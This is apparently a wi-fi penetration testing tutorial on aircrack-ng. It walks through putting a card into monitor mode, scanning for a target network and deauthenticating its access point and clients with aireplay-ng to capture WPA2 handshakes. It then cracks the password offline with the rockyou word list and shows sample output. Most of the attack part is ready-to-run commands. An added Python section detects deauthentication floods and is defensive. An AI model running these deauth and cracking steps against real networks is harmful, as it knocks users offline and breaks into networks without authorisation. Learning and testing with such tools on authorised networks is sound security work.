This post will show how to get started using aircrack-ng to discover wi-fi networks, capture handshakes, deauth clients, and crack passwords.
- Setup airmon-ng
- Capturing Packets
- Deauthing Users
- Crack Passwords
If you’re using Kali this should come pre-installed, but if not, you can install all the required tools using:
```
sudo apt install aircrack-ng
```
The first step will be to enable monitor mode on our wi-fi card. Assuming our wireless network adaptor is
wlan0, we put our card into monitor mode using:
```
airmon-ng start wlan0
```
You should now have a new wireless network adaptor with the same name and mon appended to the end, so our adaptor will be called wlan0mon.
Additionally, you may need to kill some processes that can interfere with monitor mode. This can be done using:
```
airmon-ng check kill
```
We can begin a basic capture and log the results. This will allow us to cycle through the wifi channels and discover Access Points and Clients.
```
airodump-ng -w wifiScan1 wlan0mon
```
- -w specifies the prefix for the output files.
- This ONLY listens on the 2.4 GHz range.
From the above command you’ll see two separate tables. For the first table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP |
| ESSID | Name of the Wi-Fi network |
| Beacons | Number of beacon frames received from the AP |
| CH | The current channel of the AP |
| ENC, CIPHER & AUTH | Encryption and authentication details |
For the second table:
| Column | Meaning |
|---|---|
| BSSID | MAC address of the AP the client is communicating with |
| Station | MAC address of the client |
| Frames | Data frames received from the client |
| Probes | Wi-Fi network the client is communicating with |
After seeing what networks are around, we can target specific channels and ESSIDs. Let's say our target wi-fi network is TestWifi and it is using channel 4:
```
airodump-ng -a -c 4 --essid "TestWifi" -w wifiScan2 wlan0mon
```
- -a only show associated clients
- -c 4 only capture on channel 4
- --essid "TestWifi" only show APs with the ESSID of "TestWifi"
```
 CH  4 ][ Elapsed: 1 min ][ 2022-02-05 12:06

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC  CIPHER AUTH ESSID

 11:22:33:44:55:66  -28 100      594      799    0   4  130  WPA2 CCMP   PSK  TestWifi

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 11:22:33:44:55:66  22:44:66:88:33:55  -41   12e-24     34     977         TestWifi
```
Because we are saving the output, a .cap capture file will be written as part of this. However, unless a client connects while we are listening, we won't have any handshakes recorded.
If there are already clients connected, we can attempt to forcibly disconnect them and listen for the handshake when they re-connect.
While the previous command is running and we're capturing handshakes, we can open another terminal and de-auth an AP, or a specific client connected to an AP.
Target an AP:
```
aireplay-ng -0 10 -a 11:22:33:44:55:66 wlan0mon
```
- -0 10 deauth mode, sending the deauth 10 times.
- -a MAC address of the AP.
Target a Client connected to an AP:
```
aireplay-ng -0 10 -a 11:22:33:44:55:66 -c 22:44:66:88:33:55 wlan0mon
```
- -c MAC address of the client.
After performing this attack, the capture should be left running for at least a few minutes to allow the clients to re-connect.
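Seen from the network's side, the `-0 10` burst above is very visible: a run of deauthentication frames spoofed from the AP's address arriving within a second, where a healthy AP sends at most the odd one. The following is an added detection example written for this post, not code from the aircrack-ng project: it parses raw 802.11 management frames (assumed to have no radiotap header) and flags a BSSID/receiver pair that sees more deauth or disassoc frames than a chosen threshold inside a sliding time window. The addresses are the ones from the capture shown above, the frames are constructed sample data, and the threshold and window values are arbitrary starting points.

```python
from collections import defaultdict

MGMT, DISASSOC, DEAUTH = 0, 10, 12  # 802.11 frame type / management subtypes
AP, CLIENT, BCAST = "11:22:33:44:55:66", "22:44:66:88:33:55", "ff:ff:ff:ff:ff:ff"

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Build a minimal raw 802.11 management frame: FC, duration, addr1-3, seq ctrl, body."""
    fc = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    return fc + b"\x00\x00" + hexmac(dst) + hexmac(src) + hexmac(bssid) + b"\x00\x00" + body

def parse_frame(frame):
    """Return (type, subtype, addr1, addr2, addr3), or None if the header is too short."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    return ((fc >> 2) & 0x3, (fc >> 4) & 0xF,
            mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]))

def detect_deauth_flood(frames, threshold=5, window=10.0):
    """frames: time-ordered (timestamp_seconds, raw_frame) pairs. Returns the (bssid,
    receiver) pairs that saw more than `threshold` deauth/disassoc frames within `window` s."""
    recent, alerts = defaultdict(list), []
    for ts, raw in frames:
        parsed = parse_frame(raw)
        if parsed is None:
            continue
        ftype, subtype, dst, _src, bssid = parsed
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        times = recent[(bssid, dst)]
        times.append(ts)
        while ts - times[0] > window:  # slide the window forward
            times.pop(0)
        if len(times) > threshold and (bssid, dst) not in alerts:
            alerts.append((bssid, dst))
    return alerts

# Constructed sample: ten broadcast deauths spoofed as the AP inside one second (the
# shape of the `-0 10` burst above), a beacon, and one lone deauth to a client (benign).
REASON_7 = (7).to_bytes(2, "little")  # reason code 7: class 3 frame from non-associated STA
SAMPLE_FRAMES = (
    [(i / 10, build_mgmt(DEAUTH, BCAST, AP, AP, REASON_7)) for i in range(10)]
    + [(1.0, build_mgmt(8, BCAST, AP, AP))]  # beacon, subtype 8
    + [(5.0, build_mgmt(DEAUTH, CLIENT, AP, AP, REASON_7))]
)
```

Running `detect_deauth_flood(SAMPLE_FRAMES)` reports only the broadcast burst against the AP; the single client deauth and the beacon are ignored.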
Assuming our attack was successful, we can analyse the output .cap file for handshakes and attempt to crack them offline. Let's analyse the output file wifiScan2-01.cap from our previous capture and attempt to crack the password using the rockyou word list:
```
aircrack-ng wifiScan2-01.cap -w rockyou.txt
```
```
Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

   #  BSSID              ESSID                     Encryption

   1  11:22:33:44:55:66  TestWifi                  WPA (1 handshake, with PMKID)

Choosing first network as target.

Reading packets, please wait...
Opening wifiScan2-01.cap
Read 6966 packets.

1 potential targets
```
- Normally you would be asked which target you want to crack; however, since there is only one, it is selected automatically.
The cracking will now start:
```
                               Aircrack-ng 1.6

      [00:00:04] 78245/14344391 keys tested (20290.49 k/s)

      Time left: 11 minutes, 43 seconds                          0.55%

                      Current passphrase: sukiyaki

      Master Key     : 23 17 DE 4E 8C FC 74 67 82 3F 04 E9 0A 22 CE 25
                       FD 01 FA DB 29 D2 3A 2C 79 F0 7D 05 36 DA 48 1B

      Transient Key  : E9 B7 AD 37 73 E5 A5 15 24 30 7A F0 64 AF 3B 14
                       EB 68 02 69 EE D2 C4 DF 80 C6 9F E6 11 00 E2 A8
                       FF 8A 66 56 85 AE FE B3 31 06 16 AC 6B 1A E1 DA
                       AB 21 AA 22 C9 9E 42 3E 3D ED 28 C1 F7 F1 AE E3

      EAPOL HMAC     : B8 16 E5 77 E5 AB BD B6 1A 3A 69 A3 19 1C 21 C4
```
The above attack is running at around 20 thousand keys per second on an Intel Core i7 8700. We can improve the performance a lot by using Hashcat instead of aircrack-ng to crack the password. You can read how to do that here.